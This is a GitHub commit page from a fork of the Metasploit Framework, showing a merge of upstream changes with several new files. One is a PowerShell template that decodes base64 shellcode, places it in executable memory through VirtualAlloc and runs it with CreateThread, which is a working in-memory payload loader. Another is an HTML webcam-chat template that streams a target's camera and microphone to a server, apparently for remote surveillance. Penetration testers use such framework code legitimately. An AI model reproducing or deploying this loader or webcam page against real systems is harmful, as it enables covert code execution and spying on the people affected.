forked from rapid7/metasploit-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge remote-tracking branch 'upstream/master'
- Loading branch information
1 parent
6f59b34
commit 528856d
Showing
125 changed files
with
5,553 additions
and
1,264 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
Any DjVu file can be used this is just a snazzy Metasploit one |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
function %{func_get_proc_address} { | ||
Param ($%{var_module}, $%{var_procedure}) | ||
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | ||
|
||
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure})) | ||
} | ||
|
||
function %{func_get_delegate_type} { | ||
Param ( | ||
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters}, | ||
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void] | ||
) | ||
|
||
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | ||
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed') | ||
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed') | ||
|
||
return $%{var_type_builder}.CreateType() | ||
} | ||
|
||
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") | ||
|
||
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40) | ||
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length) | ||
|
||
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero) | ||
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,193 @@ | ||
<html> | ||
<head> | ||
<title>webcam_chat</title> | ||
<style type="text/css"> | ||
div.container { | ||
position: relative; | ||
} | ||
|
||
div.windowa { | ||
height: 480px; | ||
width: 640px; | ||
border-radius: 15px; | ||
-moz-border-raidus: 15px; | ||
background-color: black; | ||
position: absolute; | ||
left: 50; | ||
padding : 10px; | ||
margin-left: auto; | ||
margin-right: auto; | ||
text-align: center; | ||
vertical-align: middle; | ||
color: white; | ||
} | ||
|
||
div.windowb { | ||
height: 180px; | ||
width: 200px; | ||
border-radius: 15px; | ||
-moz-border-raidus: 15px; | ||
background-color: #9B9B9B; | ||
position: absolute; | ||
top: 480; | ||
left: 470; | ||
padding: 10px; | ||
margin-left: auto; | ||
margin-right: auto; | ||
text-align: center; | ||
vertical-align: middle; | ||
} | ||
|
||
div.windowc { | ||
position: absolute; | ||
top: 510; | ||
left: 80; | ||
height: 150px; | ||
width: 380px; | ||
color: red; | ||
} | ||
|
||
div.footer { | ||
position: fixed; | ||
bottom: 0; | ||
width: 100%; | ||
padding: 10px; | ||
} | ||
|
||
video.peer { | ||
position: absolute; | ||
top: 15; | ||
left: 10; | ||
} | ||
|
||
video.self { | ||
position: absolute; | ||
top: 5; | ||
left: 10; | ||
} | ||
</style> | ||
<script src="=WEBRTCAPIJS="> </script> | ||
<script> | ||
window.onerror = function(e) { | ||
document.getElementById("message").innerHTML = "Error: " + e.toString(); | ||
} | ||
|
||
window.onload = function() { | ||
document.getElementById("message").innerHTML = "Waiting for the session. When the session arrives, you must manually allow the webcam to run in order to join the session." | ||
} | ||
|
||
var channel = '=CHANNEL='; | ||
var websocket = new WebSocket('ws://=SERVER='); | ||
var inSession = false; | ||
|
||
websocket.onopen = function() { | ||
websocket.push(JSON.stringify({ | ||
open: true, | ||
channel: channel | ||
})); | ||
}; | ||
|
||
websocket.push = websocket.send; | ||
websocket.send = function(data) { | ||
websocket.push(JSON.stringify({ | ||
data: data, | ||
channel: channel | ||
})); | ||
}; | ||
|
||
var peer = new PeerConnection(websocket); | ||
peer.onUserFound = function(userid) { | ||
if (inSession) { | ||
console.debug("Already in session, will not send another participation request"); | ||
return; | ||
}; | ||
|
||
userid = "=OFFERERID="; | ||
|
||
getUserMedia(function(stream) { | ||
peer.addStream(stream); | ||
peer.sendParticipationRequest(userid); | ||
inSession = true; | ||
document.getElementById("message").innerHTML = "Session is now active."; | ||
}); | ||
}; | ||
|
||
peer.onStreamAdded = function(e) { | ||
var video = e.mediaElement; | ||
if (e.userid == 'self') { | ||
video.controls = true; | ||
video.setAttribute('width', 200); | ||
video.setAttribute('height', 190); | ||
video.setAttribute('controls', false); | ||
video.setAttribute('class', 'self'); | ||
document.getElementById("windowb").appendChild(video); | ||
} | ||
else { | ||
video.controls = true; | ||
video.setAttribute('width', 640); | ||
video.setAttribute('height', 460); | ||
video.setAttribute('controls', false); | ||
video.setAttribute('class', 'peer'); | ||
document.getElementById("windowa").appendChild(video); | ||
} | ||
video.muted = false; | ||
video.volume = 0.5; | ||
video.play(); | ||
}; | ||
|
||
peer.onStreamEnded = function(e) { | ||
var video = e.mediaElement; | ||
if (video) { | ||
video.style.opacity = 0; | ||
setTimeout(function() { | ||
video.parentNode.removeChild(video); | ||
}, 1000); | ||
} | ||
document.getElementById("message").innerHTML = "The video session has ended."; | ||
}; | ||
|
||
function getUserMedia(callback) { | ||
|
||
var hints = {audio:true,video:{ | ||
optional: [], | ||
mandatory: { | ||
minWidth: 1280, | ||
minHeight: 720, | ||
maxWidth: 1920, | ||
maxHeight: 1080, | ||
minAspectRatio: 1.77 | ||
} | ||
}}; | ||
|
||
navigator.getUserMedia(hints,function(stream) { | ||
var video = document.createElement('video'); | ||
video.src = URL.createObjectURL(stream); | ||
|
||
peer.onStreamAdded({ | ||
mediaElement: video, | ||
userid: 'self', | ||
stream: stream | ||
}); | ||
|
||
callback(stream); | ||
}); | ||
} | ||
</script> | ||
</head> | ||
<body> | ||
|
||
<div class="container"> | ||
<div class="windowa" id="windowa"> | ||
</div> | ||
<div class="windowb" id="windowb"> | ||
</div> | ||
<div class="windowc"> | ||
<b>Session status (=RHOST=):</b><p></p> | ||
<span id="message"></span> | ||
</div> | ||
</div> | ||
<div class="footer"> | ||
<center><a href="http://metasploit.com/" target="_blank">metasploit.com</a></center> | ||
</div> | ||
</body> | ||
</html> |
Oops, something went wrong.